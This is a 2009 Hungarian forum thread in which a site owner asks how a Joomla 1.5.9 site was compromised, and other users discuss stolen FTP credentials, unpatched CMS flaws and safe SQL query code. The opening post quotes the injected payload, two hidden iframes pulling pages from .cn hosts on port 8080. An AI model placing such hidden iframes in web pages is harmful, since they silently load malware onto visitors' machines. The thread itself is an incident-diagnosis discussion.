Feltörtek egy oldalt, de hogyan???

Offtopic

Sziasztok!

Egy ismerősöm keresett meg, hogy valami nem stimmel az oldalával. Joomla 1.5.9 alatt lett elkészítve. Az alábbi kódot tette bele az illető minden index.html fájlba, a default.php és index.php és idex2.php fájlba.

iframe src="http://shopfilmlifeforce.cn:8080/index.php" width=138 height=180 style="visibility: hidden"
iframe src="http://thebettings.cn:8080/ts/in.cgi?pepsi55" width=125 height=125 style="visibility: hidden"

Ezt hogyan tudta megtenni, hogy fájlokat cseréljen le? Az ftp jelszó elég biztonságos mivel 11 karakterből és kis-nagybetűkből és számokból van összerakva. Ami feltűnt, hogy a létrehozott időpont az eltér a különböző fájloknál. Tehát némelyiknél percek is elteltek. Ebből gondoltam, hogy vagy ftp-n vagy szerver szinten kellett betörnie. A szerver nem saját hanem bérelt, vagyis csak a tárhely.

  • 3395 megtekintés

( trey | 2009. 06. 13., szo – 20:41 )

Az iframe tag nem engedélyezett a post-ban, hiába is teszed bele. Helyette inkább a http://hup.pastebin.com oldalra van értelme...

Egyébként erről már többször volt szó. Sok okostóbiás elmenti az FTP jelszavát a Total Commander-ben vagy más programban, közben beszop egy malware-t, ami szépen végigmegy az FTP-n levő fájlokban és hozzácsapja az okosságot. Vagy ha nem ez, akkor akár fel is nyomhatták az FTP-t, vagy megszerezték a user/jelszó párost. De mivel az első eset most a divat, inkább arra tippelek.

User error.

Illetve ne hagyjuk ki a számításból, hogy Joomla-ról van szó...

--
trey @ gépház

Fogalmam sincs, nem követem a Joomla fejlesztését, de feltételezem van joomla-security levlista vagy bármi, ami idejében figyelmeztetést küld a feliratkozott tagoknak ismert biztonsági hibákról. Ha Joomla-alapú weboldalt üzemeltetnék, biztos fel lennék iratkozva egy ilyen levlistára. Ott kellene körbenézni, hogy mostanában volt-e ilyen sebezhetőség, vagy a milw0rm-on, stb.

Ha nincs ilyen security csoportja a Joomla-nak (nem tudom, akár lehet is), akkor pedig érdemes megfontolni a mielőbbi váltást valami olyan tartalomkezelőre, aminek van ilyen listája.

--
trey @ gépház

Külön security listája nincs a Joomlának, viszont a http://www.joomla.org/download.html címen lehet e-mail értesítésre feliratkozni. Ezen kívül minden biztonsági hibáról részletes tájékoztatás található a http://developer.joomla.org/security/news.html címen.

Egyébként nem igazán értem miért kell egyből azt mondani, hogy biztos egy Joomla sebezhetőség volt, csak mert Joomla. Drupalban és más CMS-ekben is ugyanúgy vannak sebezhetőségek... Ez olyan, mint a böngészőkben talált sebezhetőségek listája, Firefox az élmezőnyben volt, mégsem hinném hogy ezért óvakodni kellene a használatától. Minél nagyobb közösség, nyilván annál több felfedezett hiba...

A legutóbbi verzió 1.5.11, a felhasználó 1.5.9-et használ. Időközben valóban találtak sebezhetőségeket, de azzal, hogy hanyag volt a felhasználó és nem frissített, én nem a Joomlát okolnám... Ezen kívül ott a rossz szerverbeállítási lehetőség (pl. nem CGI módban fut a szerver, ezért sok könyvtárnak 777 jogot ad), vagy az elmentett FTP jelszó, ezen kívül az esetlegesen használt bővítmények (amiket gondolom szintén nem frissített a felhasználó). Ezek mind olyan lehetséges feltörési módok, amelyekre sokkal nagyobb esély van, mint egy folyamatosan frissített Joomla alaprendszer feltörésére...

Csakhogy nem mindegy, hogy:
1.) mennyi ilyen hiba van
2.) mennyire "gátolja" maga a rendszer az ilyesmit (a core fizikailag érintetlen marad bármilyen bővítménnyel, az API úgy van felépítve, hogy minél hatékonyabban by design védjen általános sebezhetőségeket [lásd: db_query()])

Egy adatbázis kérést kétféleképpen lehet megírni Joomlában:

Az első módszer, ez gondolom mindenki számára ismerős: 

$id = $_GET['id'];
$query = 'SELECT * FROM jos_articles WHERE id = '. $id;

A második módszer pedig: 

$id = JRequest::getInt('id', 0, 'get');
$query = 'SELECT * FROM '. $db->nameQuote('jos_articles') .'WHERE '. $db->nameQuote('id') .' = '. $db->Quote($id);

Ennél a kódnál a JRequest::getInt() biztosítja, hogy csak számot kapjon meg változóból, és a $query-ben is ki vannak védve a sebezhetőségek. Azért már ne a Joomla legyen a felelős, hogy egyes bővítménykészítők egyszerűbbnek találják az első változatot... A Joomla! 1.6 Alpha verziója 9 nap múlva jelenik meg és lesz benne egy query builder (elnézést, nem tudom a pontos magyar megfelelőjét), hogy méginkább csökkentse a fejlesztői hibákat. Egyébként ha megnézed a biztonsági jelentéseket, SQL injekciós sebezhetőség nem mostanában volt, főkent alacsony szintű XSS és CSRF hibák voltak.

"Egyébként nem igazán értem miért kell egyből azt mondani, hogy biztos egy Joomla sebezhetőség volt,"

Ne haragudj, hogy megkérdezem, de te nem tudsz olvasni? Én előbb felvetettem, hogy lehet, hogy malware áldozata lett, utána azt hogy akár feltörhették az site-ot, megszerezhették az user/pass-t és _végül_, hogy az user error-on kívül akár Joomla sebezhetőség is lehetett. Kérlek ne vagdalkozz.

--
trey @ gépház

( Yorirou | 2009. 06. 13., szo – 21:41 )

> valami nem stimmel az oldalával. Joomla
Pontosan ez a gond :)

( Hiena v | 2009. 06. 13., szo – 21:50 )

Jahm. Joomla igencsak lyukas. Terjeng a neten par fereg ami folyamatosan torni probalja.
De ez a occso es konnyu es free tartalomkezelok diszkret baja...
--
"Maradt még 2 kB-om. Teszek bele egy TCP-IP stacket és egy bootlogót. "

Az elterjedt tartalomkezelőkre van nem egy célzott script/féreg ami kimondottan egy vagy több javítatlan sebezhetőséget használ ki. Pl tipikusan ilyennek a mysql-html injection, vagy távoli parancsfuttatási, fájlhozzáférési hibák. Sok esetben elsőre nem is tűnik fel a törés ténye, mert nem nyúlnak a tartalomhoz, hanem valamilyen stand-alone szolgáltatást (spammelés, botherder szerver, ddos stb) telepítenek és indítanak, vagy tárhelyként használják.
Az iframe beültetés általában a legutolsó dolog szokott lenni, mert elég hamar észreveszik.

--
"Maradt még 2 kB-om. Teszek bele egy TCP-IP stacket és egy bootlogót. "

( bandy | 2009. 06. 14., v – 11:32 )

A történethez annyit fűznék hozzá, hogy egy általam adminolt szerveren egy bizonyos fejlesztőhöz kapcsolható oldalakat fertőztek meg hasonló kóddal. Mikor elővettük a kedves fejlesztőt, akkor hülyének nézett mindenkit, de egy vírusirtó frissítés && teljes scan után egy fél A4-es lapra való irtanivalót találtunk a gépén.
Szóval én tray mellett és az user error mellett voksoklok. (és azóta havonta ftppass csere van)

( gyunix | 2009. 06. 14., v – 12:05 )

Megkérdeztem a ismerősömet és már kedd óta nem használta a gépét. Egy laptopja van amin lehet, hogy be van állítva a totalcommander, de ez se biztos. Így a user error kizárva.
Marad a joomla security. Közben lefrissítettem neki 1.5.11-re.

( zsirmo v | 2009. 06. 14., v – 16:36 )

totalcommander-ben elmentett jelszo + fergecske a gepen es kb. ez az eredmeny

hasonloba fotuttunk bele, web fejleszto srac gepen volt valami worm, es amit a srac szerkesztett oldalakat , mindbe ez a kod(vagy hasonlo ".cn:8080" ez egyezett mindben) lett feltolva, kozvetlen a 

body

utan.